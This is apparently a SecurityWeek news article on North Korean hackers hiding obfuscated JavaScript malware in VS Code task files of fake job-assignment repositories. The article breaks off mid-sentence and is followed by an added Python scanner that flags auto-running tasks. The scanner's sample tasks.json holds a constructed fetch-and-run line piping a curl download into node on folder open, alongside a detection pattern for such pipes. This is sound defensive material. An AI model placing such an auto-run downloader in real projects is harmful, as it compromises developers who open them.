North Korean Hackers Target macOS Developers via Malicious VS Code Projects


North Korean threat actors are abusing Visual Studio Code task configuration files for malware delivery in a new campaign targeting macOS software developers, Jamf warns.

The attacks, the security firm says, represent a fresh iteration of fake job offer campaigns attributed to North Korean hackers, including Operation Dream Job, Contagious Interview, ClickFake Interview, and DeceptiveDevelopment.

Instead of using a ClickFix-based technique for malware delivery, the new attacks trick victims into accessing or cloning repositories hosted on GitHub or GitLab, under the pretext of a job assignment.

The malicious projects, Jamf explains, contain VS Code task configuration files with heavily obfuscated malicious JavaScript code.

Once the repositories are opened in VS Code, the victim is prompted to trust the project’s author, which results in malicious commands being executed on the macOS system.

The executed shell command retrieves a JavaScript payload and pipes it into the Node.js runtime, which ensures ...
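To check a cloned repository before opening it in VS Code, the following added example (not code from Jamf or from the campaign) scans `.vscode/tasks.json` files for tasks that run automatically and for commands that pipe a download into an interpreter. It assumes the auto-run relies on VS Code's `runOptions.runOn: "folderOpen"` setting, which the summary above does not name; the sample file and its `example.invalid` URL are constructed.

```python
import json
import re
from pathlib import Path

# Heuristic: a downloader whose output is piped straight into an interpreter.
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(node|sh|bash|zsh|python3?)\b")

# Constructed sample tasks.json (JSONC: comments and trailing commas allowed).
SAMPLE = '''{
  // constructed sample, not taken from the campaign
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["test"]},
    {"label": "prepare", "type": "shell",
     "command": "curl -s https://example.invalid/p.js | node",
     "runOptions": {"runOn": "folderOpen"},
    },
  ]
}'''

def _drop(pattern, text):
    """Delete matches of `pattern`, leaving JSON string literals untouched."""
    rx = re.compile(r'"(?:\\.|[^"\\])*"|' + pattern, re.S)
    return rx.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)

def parse_jsonc(text):
    """Strip // and /* */ comments, then trailing commas, then parse as JSON."""
    text = _drop(r"//[^\n]*|/\*.*?\*/", text)
    return json.loads(_drop(r",(?=\s*[}\]])", text))

def _text(value):
    # command/args entries may be plain strings or {"value": ..., "quoting": ...}
    return str(value.get("value", "")) if isinstance(value, dict) else str(value)

def scan_tasks(text):
    """Return one finding per task that auto-runs or fetches-and-executes."""
    findings = []
    for task in parse_jsonc(text).get("tasks", []):
        # Per-OS overrides (e.g. "osx") can carry a different command.
        scopes = [task] + [task[k] for k in ("osx", "linux", "windows") if k in task]
        cmd = " ".join(_text(x) for s in scopes for x in [s.get("command", ""), *s.get("args", [])])
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        fetch = bool(FETCH_PIPE.search(cmd))
        if auto or fetch:
            findings.append({"label": task.get("label", "?"), "auto_run": auto, "fetch_pipe": fetch})
    return findings

def scan_repo(root):
    """Scan every .vscode/tasks.json under `root`; returns {path: findings}."""
    return {str(p): scan_tasks(p.read_text(encoding="utf-8"))
            for p in Path(root).rglob(".vscode/tasks.json")}
```

Run `scan_repo()` on the checkout from a terminal or in a disposable VM before the folder is opened and trusted in the editor; an empty result does not clear the repository, since obfuscated commands can evade the pattern.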


Copyright of this story solely belongs to SecurityWeek.